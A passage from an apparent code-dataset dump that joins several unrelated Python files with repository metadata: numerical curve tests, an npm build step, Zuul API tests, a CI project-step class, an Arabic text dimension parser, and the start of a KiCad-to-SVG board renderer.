np.testing.assert_array_equal(
builder.calc_constraints(5),
constraints
)
def test_calc_big_A(self):
big_A = np.load('test/test_files/big_A.npy')
np.testing.assert_array_equal(
builder.calc_big_A(knots, taus),
big_A
)
def test_calc_B(self):
B = np.load('test/test_files/B.npy')
np.testing.assert_array_equal(
builder.calc_B(prices, taus),
B
)
def test_solve_lineq(self):
lineq_ans = np.load('test/test_files/lineq_ans.npy')
lineq_ans = [arr for arr in lineq_ans]
np.testing.assert_array_almost_equal(
builder.solve_lineq(
builder.calc_big_H(taus),
builder.calc_big_A(knots, taus),
builder.calc_B(prices, taus)
),
lineq_ans
)
lineq_ans_no_split = np.load('test/test_files/lineq_ans_no_split.npy')
np.testing.assert_array_almost_equal(
builder.solve_lineq(
builder.calc_big_H(taus),
builder.calc_big_A(knots, taus),
builder.calc_B(prices, taus),
split=False
),
lineq_ans_no_split
)
def test_smfc(self):
self.assertEqual(
builder.smfc(2, [2,3,4,5,6]),
88
)
self.assertEqual(
builder.smfc(11, [5,2,9,5,4]),
77015
)
def test_curve_values(self):
curve_values = np.load('test/test_files/curve_values.npy')
curve_values_flat = np.load('test/test_files/curve_values_flat.npy')
H = builder.calc_big_H(taus)
A = builder.calc_big_A(knots, taus)
B = builder.calc_B(prices, taus)
X = builder.solve_lineq(H, A, B)
np.testing.assert_array_almost_equal(
builder.curve_values(taus, X, builder.smfc),
curve_values
)
np.testing.assert_array_almost_equal(
builder.curve_values(taus, X, builder.smfc, flatten=True),
curve_values_flat
)
def test_calc_smfc(self):
prices2 = [2,4,7,5,4,3,2]
dr = axis.date_ranges(datetime.datetime(2018,11,26), 5)
curve_values = np.load('test/test_files/curve_values2.npy')
curve_values_flat = np.load('test/test_files/curve_values2_no_flat.npy').tolist()
np.testing.assert_array_almost_equal(
builder.calc_smfc(dr, prices2),
curve_values
)
test_curve_values = builder.calc_smfc(dr, prices2, flatten=False)
for i in range (0, len(test_curve_values)):
np.testing.assert_array_almost_equal(test_curve_values[i], curve_values_flat[i])
#### This one might be harder to test
#
# def test_build_smfc_curve(self):
# curve_values = np.load('test/test_files/curve_values3.npy')
# curve_values_flat = np.load('test/test_files/curve_values3_no_flat.npy')
# test_curve_values = builder.build_smfc_curve(
# prices,
# start_date=datetime.datetime(2018,11,26)
# )
# test_curve_values_no_flat = builder.build_smfc_curve(
# prices,
# start_date=datetime.datetime(2018,11,26),
# flatten=False
# )
# for i in len(curve_values):
# np.testing.assert_array_equal(
# curve_values
# )
if __name__ == '__main__':
unittest.main() | 30.289655 | 92 | 0.589936 | 575 | 4,392 | 4.194783 | 0.149565 | 0.100332 | 0.058043 | 0.08126 | 0.619818 | 0.527363 | 0.473466 | 0.41874 | 0.333748 | 0.249585 | 0 | 0.025147 | 0.302823 | 4,392 | 145 | 93 | 30.289655 | 0.762573 | 0.133424 | 0 | 0.262136 | 0 | 0 | 0.099075 | 0.096962 | 0 | 0 | 0 | 0 | 0.135922 | 1 | 0.097087 | false | 0 | 0.038835 | 0 | 0.145631 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
f67699a54e5a98e0d273159f57f639b8fe6cfffb | 2,091 | py | Python | steps/make/npm.py | flipcoder/siege-tools | df8a9fa5a4a6f2bcce4789cebe17b0c4dd3f7e60 | [
"MIT"
] | 6 | 2015-08-14T15:26:38.000Z | 2019-11-14T01:08:31.000Z | steps/make/npm.py | flipcoder/siege-tools | df8a9fa5a4a6f2bcce4789cebe17b0c4dd3f7e60 | [
"MIT"
] | null | null | null | steps/make/npm.py | flipcoder/siege-tools | df8a9fa5a4a6f2bcce4789cebe17b0c4dd3f7e60 | [
"MIT"
] | 1 | 2019-05-10T04:52:40.000Z | 2019-05-10T04:52:40.000Z | #!/usr/bin/env python
import os
import sgmake
import subprocess
import json
from common import Status
from common import Settings
from common import Support
from common import call
def make(project):
try:
project.npmpath = os.path.abspath(os.path.expanduser(Settings.get('npm_path')))
except:
project.npmpath = ""
if os.path.isfile("package.json.ls") or os.path.isfile("package.lson"):
try:
project.lscpath = os.path.abspath(os.path.expanduser(Settings.get('lsc_path')))
except:
project.lscpath = ""
if os.path.isfile("package.json.ls") :
lscmd = [
os.path.join(project.lscpath,"lsc"),
"-jc", "package.json.ls"
]
elif os.path.isfile("package.lson"):
lscmd = [
os.path.join(project.lscpath,"lsc"),
"-jc", "package.lson"
]
try:
call(lscmd)
except subprocess.CalledProcessError:
return Status.FAILURE
#try:
# project.npm_params
#except:
# project.npm_params = []
cmdline = [os.path.join(project.npmpath,"npm"), "install"]
#if project.npm_params:
# cmdline += project.npm_params
#print " ".join(cmdline)
try:
call(cmdline)
except subprocess.CalledProcessError:
return Status.FAILURE
return Status.SUCCESS
#def update(project):
#if os.path.isfile("package.json.ls") or os.path.isfile("package.lson"):
# # remove temp generated package.json
# project.clean += ['package.json']
# pass
def compatible(project):
support = Support.ENVIRONMENT | Support.USER | Support.AUTO
if os.path.isfile("package.json") or \
os.path.isfile("package.json.ls") or \
os.path.isfile("package.lson"):
with open('package.json') as f:
j = json.load(f)
if not (u'engines' in j and u'yarn' in j[u'engines'].keys()):
support |= Support.PROJECT
return support
| 27.155844 | 91 | 0.573888 | 242 | 2,091 | 4.933884 | 0.285124 | 0.080402 | 0.090452 | 0.143216 | 0.417923 | 0.396985 | 0.28727 | 0.264657 | 0.197655 | 0.128978 | 0 | 0 | 0.297944 | 2,091 | 76 | 92 | 27.513158 | 0.813352 | 0.159254 | 0 | 0.291667 | 0 | 0 | 0.10786 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.041667 | false | 0 | 0.166667 | 0 | 0.291667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
f67772509b463ffdb32e8b1ff18b59f81eb3ecda | 2,674 | py | Python | tests/sources/zuul/test_api.py | bregman-arie/cibyl | 41132c1cb885f3306fe6aff59225cfafb6563207 | [
"Apache-2.0"
] | null | null | null | tests/sources/zuul/test_api.py | bregman-arie/cibyl | 41132c1cb885f3306fe6aff59225cfafb6563207 | [
"Apache-2.0"
] | null | null | null | tests/sources/zuul/test_api.py | bregman-arie/cibyl | 41132c1cb885f3306fe6aff59225cfafb6563207 | [
"Apache-2.0"
] | null | null | null | """
# Copyright 2022 Red Hat
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
from unittest import TestCase
from unittest.mock import Mock, PropertyMock
from cibyl.sources.zuul.api import ZuulAPI, ZuulAPIError, safe_request
class TestSafeRequest(TestCase):
"""Tests for :func:`safe_request`.
"""
def test_wraps_errors(self):
"""Tests that errors coming out of the call are wrapped around the
API's error type.
"""
@safe_request
def request():
raise Exception
self.assertRaises(ZuulAPIError, request)
def test_returns_result_when_no_error(self):
"""Tests that the call's output is returned when everything goes right.
"""
result = {'some_key': 'some_value'}
@safe_request
def request():
return result
self.assertEqual(result, request())
class TestZuulAPIFromUrl(TestCase):
"""Tests for :meth:`ZuulAPI.from_url`.
"""
def test_with_all_args(self):
"""Checks that the object is built correctly when all arguments are
provided.
"""
url = 'url/to/zuul/'
cert = 'path/to/cert.pem'
auth_token = 'token'
api = ZuulAPI.from_url(url, cert, auth_token)
self.assertEqual(url, api.url)
self.assertEqual(cert, api.cert)
self.assertEqual(auth_token, api.auth_token)
def test_with_no_cert(self):
"""Checks that object is built correctly when the certificate is not
provided.
"""
url = 'url/to/zuul/'
cert = None
auth_token = 'token'
api = ZuulAPI.from_url(url, cert, auth_token)
self.assertEqual(url, api.url)
self.assertEqual(None, api.cert)
self.assertEqual(auth_token, api.auth_token)
class TestZuulAPI(TestCase):
"""Tests for :class:`ZuulAPI`.
"""
def test_info(self):
"""Tests that the correct info from :meth:`ZuulAPI.info` is
retrieved.
"""
client = Mock()
client.info = PropertyMock()
api = ZuulAPI(client)
self.assertEqual(client.info, api.info())
| 27.854167 | 79 | 0.636874 | 336 | 2,674 | 4.97619 | 0.404762 | 0.07177 | 0.028708 | 0.019139 | 0.214115 | 0.183014 | 0.154306 | 0.154306 | 0.154306 | 0.102871 | 0 | 0.004073 | 0.26552 | 2,674 | 95 | 80 | 28.147368 | 0.847251 | 0.408003 | 0 | 0.368421 | 0 | 0 | 0.046353 | 0 | 0 | 0 | 0 | 0 | 0.236842 | 1 | 0.184211 | false | 0 | 0.078947 | 0.026316 | 0.368421 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
f67860e5e860f7dd53b1e0dfd7d2593031b44100 | 3,735 | py | Python | src/cihpc/core/structures/project_step.py | janhybs/ci-hpi | 293740c7af62ecada5744ff663266de2e3d37445 | [
"MIT"
] | 1 | 2020-01-09T13:00:18.000Z | 2020-01-09T13:00:18.000Z | src/cihpc/core/structures/project_step.py | janhybs/ci-hpi | 293740c7af62ecada5744ff663266de2e3d37445 | [
"MIT"
] | null | null | null | src/cihpc/core/structures/project_step.py | janhybs/ci-hpi | 293740c7af62ecada5744ff663266de2e3d37445 | [
"MIT"
] | 2 | 2018-08-12T01:13:28.000Z | 2018-08-13T14:37:28.000Z | #!/usr/bin/python
# author: Jan Hybs
import cihpc.core.structures as structures_init
from cihpc.cfg.config import global_configuration
from cihpc.core.structures.project_step_collect import ProjectStepCollect
from cihpc.core.structures.project_step_container import ProjectStepContainer
from cihpc.core.structures.project_step_git import ProjectStepGit
from cihpc.core.structures.project_step_measure import ProjectStepMeasure
from cihpc.core.structures.project_step_parallel import ProjectStepParallel
from cihpc.core.structures.project_step_repeat import ProjectStepRepeat
from cihpc.core.structures.project_step_cache import ProjectStepCache
class ProjectStep(object):
"""
Class representing single step in a project
:type section: cihpc.core.structures.project_section.ProjectSection
:type git: list[ProjectStepGit]
:type description: str
:type enabled: bool
:type verbose: bool
:type container: cihpc.core.structures.project_step_container.ProjectStepContainer
:type smart_repeat: cihpc.core.structures.project_step_repeat.ProjectStepRepeat
:type repeat: int
:type shell: str
:type output: str
:type variables: list
:type measure: from cihpc.core.structures.project_step_measure.ProjectStepMeasure
:type collect: cihpc.core.structures.project_step_collectProjectStepCollect
:type parallel: cihpc.core.structures.project_step_parallel.ProjectStepParallel
:type cache: cihpc.core.structures.project_step_cache.ProjectStepCache
"""
def __init__(self, section, **kwargs):
self.name = kwargs['name']
self.git = [ProjectStepGit(**x) for x in kwargs.get('git', [])]
self.description = kwargs.get('description', [])
self.enabled = kwargs.get('enabled', True)
self.verbose = structures_init.pick(kwargs, False, 'verbose', 'debug')
self.container = structures_init.new(kwargs, 'container', ProjectStepContainer)
self.smart_repeat = ProjectStepRepeat(kwargs.get('repeat', 1))
self.shell = kwargs.get('shell', None)
self.parallel = ProjectStepParallel(kwargs.get('parallel', dict()))
self.cache = ProjectStepCache(kwargs.get('cache', dict()))
# available choices are
# stdout - live output to the stdout
# log - redirects to the log file
# log+stdout - redirect output to temp file, and after the subprocess
# has ended, print out to stdout and append to file
# stdout+log - same as above
# null - redirects to /dev/null, note that in config.yaml
# the value must be 'null' instead of null
self.output = kwargs.get(
'output',
'stdout' if global_configuration.tty else 'log+stdout'
)
# build matrix
self.variables = kwargs.get('variables', [])
# artifact generation
self.measure = structures_init.new(kwargs, 'measure', ProjectStepMeasure)
# artifact collection
self.collect = structures_init.new(kwargs, 'collect', ProjectStepCollect)
# project section
self.section = section
# save raw configuration
self.raw_config = kwargs
# if git repos were set, the first one is taken as
# a project main git repository
if self.git:
global_configuration.project_git = self.git[0]
@property
def ord_name(self):
return '%d.%s' % (self.section.steps.index(self) + 1, self.name)
@property
def repeat(self):
return self.smart_repeat.value
| 41.966292 | 94 | 0.668273 | 418 | 3,735 | 5.863636 | 0.308612 | 0.05508 | 0.116279 | 0.148511 | 0.200734 | 0.188494 | 0.033456 | 0 | 0 | 0 | 0 | 0.001065 | 0.246051 | 3,735 | 88 | 95 | 42.443182 | 0.869318 | 0.398126 | 0 | 0.052632 | 0 | 0 | 0.055659 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.078947 | false | 0 | 0.236842 | 0.052632 | 0.394737 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
f678eb53ea8b81db409d272313d26c5cd3f11ca6 | 3,747 | py | Python | maha/parsers/functions/parse_dimensions.py | MuhammadAlBarham/Maha | c28e0b7ca69942905548f013a1e35208ef8de7e7 | [
"BSD-3-Clause"
] | 1 | 2021-11-02T08:25:12.000Z | 2021-11-02T08:25:12.000Z | maha/parsers/functions/parse_dimensions.py | vikrambala/Maha | 67020437e745b8fca4770186608326b81073d4b7 | [
"BSD-3-Clause"
] | null | null | null | maha/parsers/functions/parse_dimensions.py | vikrambala/Maha | 67020437e745b8fca4770186608326b81073d4b7 | [
"BSD-3-Clause"
] | null | null | null | __all__ = ["parse_dimension"]
from typing import List
from maha.parsers.rules import (
RULE_DURATION,
RULE_NAME,
RULE_NUMERAL,
RULE_ORDINAL,
RULE_TIME,
)
from maha.parsers.templates import Dimension, DimensionType
from maha.rexy import Expression
def parse_dimension(
text: str,
amount_of_money: bool = None,
duration: bool = None,
distance: bool = None,
numeral: bool = None,
ordinal: bool = None,
quantity: bool = None,
temperature: bool = None,
time: bool = None,
volume: bool = None,
names: bool = None,
) -> List[Dimension]:
"""Extract dimensions from a given text.
Parameters
----------
text : str
Text to extract dimensions from
amount_of_money : bool, optional
Extract amount of money using the rule :data:`~.RULE_AMOUNT_OF_MONEY`,
by default None
duration : bool, optional
Extract duration using the rule :data:`~.RULE_DURATION`,
by default None
distance : bool, optional
Extract distance using the rule :data:`~.RULE_DISTANCE`,
by default None
numeral : bool, optional
Extract numeral using the rule :data:`~.RULE_NUMERAL`,
by default None
ordinal : bool, optional
Extract ordinal using the rule :data:`~.RULE_ORDINAL`,
by default None
quantity : bool, optional
Extract quantity using the rule :data:`~.RULE_QUANTITY`,
by default None
temperature : bool, optional
Extract temperature using the rule :data:`~.RULE_TEMPERATURE`,
by default None
time : bool, optional
Extract time using the rule :data:`~.RULE_TIME`,
by default None
volume : bool, optional
Extract volume using the rule :data:`~.RULE_VOLUME`,
by default None
Returns
-------
List[:class:`~.Dimension`]
List of :class:`~.Dimension` objects extracted from the text
Raises
------
ValueError
If no argument is set to True
"""
output = []
if amount_of_money:
raise NotImplementedError("amount_of_money is not implemented yet")
if duration:
output.extend(_get_dimensions(RULE_DURATION, text, DimensionType.DURATION))
if distance:
raise NotImplementedError("distance is not implemented yet")
if numeral:
output.extend(_get_dimensions(RULE_NUMERAL, text, DimensionType.NUMERAL))
if ordinal:
output.extend(_get_dimensions(RULE_ORDINAL, text, DimensionType.ORDINAL))
if quantity:
raise NotImplementedError("quantity is not implemented yet")
if temperature:
raise NotImplementedError("temperature is not implemented yet")
if time:
output.extend(_get_dimensions(RULE_TIME, text, DimensionType.TIME))
if volume:
raise NotImplementedError("volume is not implemented yet")
if names:
output.extend(_get_dimensions(RULE_NAME, text, DimensionType.NAME))
if not any(
[
amount_of_money,
duration,
distance,
numeral,
ordinal,
quantity,
temperature,
time,
volume,
names,
]
):
raise ValueError("At least one argument should be True")
return output
def _get_dimensions(
rule: Expression, text: str, dimension_type: DimensionType
) -> List[Dimension]:
output = []
for result in rule(text):
output.append(
Dimension(
result.expression,
text[result.start : result.end],
result.value,
result.start,
result.end,
dimension_type,
)
)
return output
| 28.603053 | 83 | 0.619696 | 410 | 3,747 | 5.539024 | 0.195122 | 0.035227 | 0.075297 | 0.063408 | 0.189344 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.296771 | 3,747 | 130 | 84 | 28.823077 | 0.86186 | 0.332266 | 0 | 0.077922 | 0 | 0 | 0.091649 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.025974 | false | 0 | 0.051948 | 0 | 0.103896 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
f679aca9364b8dc5091f23223316413bce1eb328 | 16,854 | py | Python | pcbdraw.py | Gasman2014/PcbDraw | 06920b8676a1a6f9d585111769b4785e9b7687fc | [
"MIT"
] | 1 | 2019-04-04T09:36:28.000Z | 2019-04-04T09:36:28.000Z | pcbdraw.py | arturo182/PcbDraw | 06920b8676a1a6f9d585111769b4785e9b7687fc | [
"MIT"
] | null | null | null | pcbdraw.py | arturo182/PcbDraw | 06920b8676a1a6f9d585111769b4785e9b7687fc | [
"MIT"
] | 1 | 2018-10-16T02:16:27.000Z | 2018-10-16T02:16:27.000Z | #!/usr/bin/env python
import argparse
import json
import math
import os
import re
import shutil
import sys
import tempfile
import pcbnew
from lxml import etree
default_style = {
"copper": "#417e5a",
"board": "#4ca06c",
"silk": "#f0f0f0",
"pads": "#b5ae30",
"outline": "#000000"
}
class SvgPathItem:
def __init__(self, path):
path = re.sub(r"([MLA])(\d+)", r"\1 \2", path)
path = re.split("[, ]", path)
path = filter( lambda x: x, path)
if path[0] != "M":
raise SyntaxError("Only paths with absolute position are supported")
self.start = tuple(map(float, path[1:3]))
path = path[3:]
if path[0] == "L":
x = float(path[1])
y = float(path[2])
self.end = (x, y)
self.type = path[0]
self.args = None
elif path[0] == "A":
args = map(float, path[1:8])
self.end = (args[5], args[6])
self.args = args[0:5]
self.type = path[0]
else:
raise SyntaxError("Unsupported path element " + path[0])
@staticmethod
def is_same(p1, p2):
dx = p1[0] - p2[0]
dy = p1[1] - p2[1]
return math.sqrt(dx*dx+dy*dy) < 5
def format(self, first):
ret = ""
if first:
ret += " M {} {} ".format(*self.start)
ret += self.type
if self.args:
ret += " " + " ".join(map(lambda x: str(x).rstrip('0').rstrip('.'), self.args))
ret += " {} {} ".format(*self.end)
return ret
def flip(self):
self.start, self.end = self.end, self.start
if self.type == "A":
self.args[4] = 1 if self.args[4] < 0.5 else 0
def unique_prefix():
unique_prefix.counter += 1
return "pref_" + str(unique_prefix.counter)
unique_prefix.counter = 0
def ki2dmil(val):
return val / 2540
def extract_svg_content(filename):
prefix = unique_prefix() + "_"
root = etree.parse(filename).getroot()
# We have to ensure all Ids in SVG are unique. Let's make it nasty by
# collecting all ids and doing search & replace
# Potentially dangerous (can break user text)
ids = []
for el in root.getiterator():
if "id" in el.attrib and el.attrib["id"] != "origin":
ids.append(el.attrib["id"])
with open(filename) as f:
content = f.read()
for i in ids:
content = content.replace("#"+i, "#" + prefix + i)
root = etree.fromstring(content)
# Remove SVG namespace to ease our lifes and change ids
for el in root.getiterator():
if "id" in el.attrib and el.attrib["id"] != "origin":
el.attrib["id"] = prefix + el.attrib["id"]
if '}' in str(el.tag):
el.tag = el.tag.split('}', 1)[1]
return [ x for x in root if x.tag and x.tag not in ["title", "desc"]]
def strip_fill_svg(root):
keys = ["fill", "stroke"]
for el in root.getiterator():
if "style" in el.attrib:
s = el.attrib["style"].split(";")
s = filter(lambda x: x.strip().split(":")[0] not in keys, s)
el.attrib["style"] = ";".join(s).replace(" ", " ").strip()
def empty_svg(**attrs):
document = etree.ElementTree(etree.fromstring(
"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3.org/2000/svg" version="1.1"
width="29.7002cm" height="21.0007cm" viewBox="0 0 116930 82680 ">
<title>Picutre generated by pcb2svg</title>
<desc>Picture generated by pcb2svg</desc>
</svg>"""))
root = document.getroot()
for key, value in attrs.items():
root.attrib[key] = value
return document
def get_board_polygon(svg_elements):
"""
Try to connect independents segments on Edge.Cuts and form a polygon
return SVG path element with the polygon
"""
elements = []
path = ""
for group in svg_elements:
for svg_element in group:
if svg_element.tag == "path":
elements.append(SvgPathItem(svg_element.attrib["d"]))
elif svg_element.tag == "circle":
# Convert circle to path
att = svg_element.attrib
s = " M {0} {1} m-{2} 0 a {2} {2} 0 1 0 {3} 0 a {2} {2} 0 1 0 -{3} 0 ".format(
att["cx"], att["cy"], att["r"], 2 * float(att["r"]))
path += s
outline = [elements[0]]
elements = elements[1:]
while True:
size = len(outline)
for i, e in enumerate(elements):
if SvgPathItem.is_same(outline[0].start, e.end):
outline.insert(0, e)
elif SvgPathItem.is_same(outline[0].start, e.start):
e.flip()
outline.insert(0, e)
elif SvgPathItem.is_same(outline[-1].end, e.start):
outline.append(e)
elif SvgPathItem.is_same(outline[-1].end, e.end):
e.flip()
outline.append(e)
else:
continue
del elements[i]
break
if size == len(outline):
first = True
for x in outline:
path += x.format(first)
first = False
if elements:
outline = [elements[0]]
elements = elements[1:]
else:
e = etree.Element("path", d=path, style="fill-rule=evenodd;")
return e
def process_board_substrate_layer(container, name, source, colors):
layer = etree.SubElement(container, "g", id="substrate-"+name,
style="fill:{0}; stroke:{0};".format(colors[name]))
if name == "pads":
layer.attrib["mask"] = "url(#pads-mask)";
for element in extract_svg_content(source):
strip_fill_svg(element)
layer.append(element)
def process_board_substrate_base(container, name, source, colors):
clipPath = etree.SubElement(etree.SubElement(container, "defs"), "clipPath")
clipPath.attrib["id"] = "cut-off"
clipPath.append(get_board_polygon(extract_svg_content(source)))
layer = etree.SubElement(container, "g", id="substrate-"+name,
style="fill:{0}; stroke:{0};".format(colors[name]))
layer.append(get_board_polygon(extract_svg_content(source)))
outline = etree.SubElement(layer, "g",
style="fill:{0}; stroke: {0};".format(colors["outline"]))
for element in extract_svg_content(source):
strip_fill_svg(element)
outline.append(element)
def process_board_substrate_mask(container, name, source, colors):
mask = etree.SubElement(etree.SubElement(container, "defs"), "mask")
mask.attrib["id"] = name
for element in extract_svg_content(source):
for item in element.getiterator():
if "style" in item.attrib:
# KiCAD plots in black, for mask we need white
item.attrib["style"] = item.attrib["style"].replace("#000000", "#ffffff");
mask.append(element)
def get_board_substrate(board, colors, holes):
"""
Plots all front layers from the board and arranges them in a visually appealing style.
return SVG g element with the board substrate
"""
toPlot = [
("board", [pcbnew.Edge_Cuts], process_board_substrate_base),
("copper", [pcbnew.F_Cu], process_board_substrate_layer),
("pads", [pcbnew.F_Cu], process_board_substrate_layer),
("pads-mask", [pcbnew.F_Mask], process_board_substrate_mask),
("silk", [pcbnew.F_SilkS], process_board_substrate_layer),
("outline", [pcbnew.Edge_Cuts], process_board_substrate_layer)]
container = etree.Element('g')
container.attrib["clip-path"] = "url(#cut-off)";
tmp = tempfile.mkdtemp()
pctl = pcbnew.PLOT_CONTROLLER(board)
popt = pctl.GetPlotOptions()
popt.SetOutputDirectory(tmp)
popt.SetScale(1)
popt.SetMirror(False)
try:
popt.SetPlotOutlineMode(False)
except:
# Method does not exist in older versions of KiCad
pass
popt.SetTextMode(pcbnew.PLOTTEXTMODE_STROKE)
for f, layers, _ in toPlot:
pctl.OpenPlotfile(f, pcbnew.PLOT_FORMAT_SVG, f)
for l in layers:
pctl.SetColorMode(False)
pctl.SetLayer(l)
pctl.PlotLayer()
pctl.ClosePlot()
for f, _, process in toPlot:
for svg_file in os.listdir(tmp):
if svg_file.endswith("-" + f + ".svg"):
process(container, f, os.path.join(tmp, svg_file), colors)
shutil.rmtree(tmp)
if holes:
container.append(get_hole_mask(board))
container.attrib["mask"] = "url(#hole-mask)";
return container
def walk_components(board, export):
module = board.GetModules()
while True:
if not module:
return
# Top is for Eagle boards imported to KiCAD
if str(module.GetLayerName()) not in ["Top", "F.Cu"]:
module = module.Next()
continue
lib = str(module.GetFPID().GetLibNickname()).strip()
try:
name = str(module.GetFPID().GetFootprintName()).strip()
except AttributeError:
# it seems we are working on Kicad >4.0.6, which has a changed method name
name = str(module.GetFPID().GetLibItemName()).strip()
value = unicode(module.GetValue()).strip()
ref = unicode(module.GetReference()).strip()
center = module.GetCenter()
orient = math.radians(module.GetOrientation() / 10)
pos = (center.x, center.y, orient)
export(lib, name, value, ref, pos)
module = module.Next()
def get_hole_mask(board):
defs = etree.Element("defs")
mask = etree.SubElement(defs, "mask", id="hole-mask")
container = etree.SubElement(mask, "g")
bb = board.ComputeBoundingBox();
bg = etree.SubElement(container, "rect", x="0", y="0", fill="white")
bg.attrib["x"] = str(ki2dmil(bb.GetX()))
bg.attrib["y"] = str(ki2dmil(bb.GetY()))
bg.attrib["width"] = str(ki2dmil(bb.GetWidth()))
bg.attrib["height"] = str(ki2dmil(bb.GetHeight()))
module = board.GetModules()
while module:
if module.GetPadCount() == 0:
module = module.Next()
continue
pad = module.Pads()
try:
pad.GetPosition()
except:
# Newest nightly renames Pads to PadList
pad = module.PadsList()
orient = module.GetOrientation()
while pad:
pos = pad.GetPosition()
pos.x = ki2dmil(pos.x)
pos.y = ki2dmil(pos.y)
size = map(ki2dmil, pad.GetDrillSize())
if size[0] > 0 and size[1] > 0:
if size[0] < size[1]:
stroke = size[0]
length = size[1] - size[0]
points = "{} {} {} {}".format(0, -length / 2, 0, length / 2)
else:
stroke = size[1]
length = size[0] - size[1]
points = "{} {} {} {}".format(-length / 2, 0, length / 2, 0)
el = etree.SubElement(container, "polyline")
el.attrib["stroke-linecap"] = "round"
el.attrib["stroke"] = "black"
el.attrib["stroke-width"] = str(stroke)
el.attrib["points"] = points
el.attrib["transform"] = "translate({} {}) rotate({})".format(
pos.x, pos.y, -orient)
pad = pad.Next()
module = module.Next()
return defs
def get_model_file(paths, lib, name, ref, remapping):
""" Find model file in library considering component remapping """
for path in paths:
if ref in remapping:
lib, name = tuple(remapping[ref].split(":"))
f = os.path.join(path, lib, name + ".svg")
if os.path.isfile(f):
return f
return None
def print_component(paths, lib, name, value, ref, pos, remapping={}):
f = get_model_file(paths, lib, name, ref, remapping)
msg = "{} with package {}:{} at [{},{},{}] -> {}".format(
ref, lib, name, pos[0], pos[1], math.degrees(pos[2]), f if f else "Not found")
print(msg)
def component_from_library(parent, paths, lib, name, value, ref, pos, placeholder=True, remapping={}):
if not name:
return
f = get_model_file(paths, lib, name, ref, remapping)
if not f:
print("Warning: component '{}' from library '{}' was not found".format(name, lib))
if placeholder:
etree.SubElement(parent, "rect", x=str(ki2dmil(pos[0])), y=str(ki2dmil(pos[1])),
width="300", height="300", style="fill:red;")
return
parent.append(etree.Comment("{}:{}".format(lib, name)))
r = etree.SubElement(parent, "g")
for x in extract_svg_content(f):
r.append(x)
origin_x = 0
origin_y = 0
origin = r.find(".//*[@id='origin']")
if origin is not None:
origin_x = float(origin.attrib["x"])
origin_y = float(origin.attrib["y"])
origin.getparent().remove(origin)
else:
print("Warning: component '{}' from library '{}' has no ORIGIN".format(name, lib))
r.attrib["transform"] = "translate({} {}) scale(393.700787402) rotate({}) translate({}, {})".format(
ki2dmil(pos[0]), ki2dmil(pos[1]),
-math.degrees(pos[2]), -origin_x, -origin_y)
def load_style(style_file):
try:
with open(style_file, "r") as f:
style = json.load(f)
except IOError:
raise RuntimeError("Cannot open style " + style_file)
required = set(["copper", "board", "silk", "pads", "outline"])
missing = required - set(style.keys())
if missing:
raise RuntimeError("Missing following keys in style {}: {}"
.format(style_file, ", ".join(missing)))
extra = set(style.keys()) - required
for x in extra:
print("Warning: extra key '" + x + "' in style")
# ToDo: Check validity of colors (SVG compatible format)
return style
def load_remapping(remap_file):
if not remap_file:
return {}
try:
with open(remap_file, "r") as f:
return json.load(f)
except IOError:
raise RuntimeError("Cannot open remapping file " + remap_file)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-s", "--style", help="JSON file with board style")
parser.add_argument("libraries", help="directories containing SVG footprints")
parser.add_argument("output", help="destination for final SVG")
parser.add_argument("board", help=".kicad_pcb file to draw")
parser.add_argument("-p", "--placeholder", action="store_true",
help="show placeholder for missing components")
parser.add_argument("-m", "--remap",
help="JSON file with map part reference to <lib>:<model> to remap packages")
parser.add_argument("-l", "--list-components", action="store_true",
help="Dry run, just list the components")
parser.add_argument("--no-drillholes", action="store_true", help="Do not make holes transparent")
args = parser.parse_args()
args.libraries = args.libraries.split(',')
print(args)
try:
if args.style:
style = load_style(args.style)
else:
style = default_style
remapping = load_remapping(args.remap)
except RuntimeError as e:
print(e.message)
sys.exit(1)
try:
print("Please ignore following debug output of KiCAD Python API")
board = pcbnew.LoadBoard(args.board)
print("End of KiCAD debug output")
except IOError:
print("Cannot open board " + args.board)
sys.exit(1)
if args.list_components:
walk_components(board, lambda lib, name, val, ref, pos:
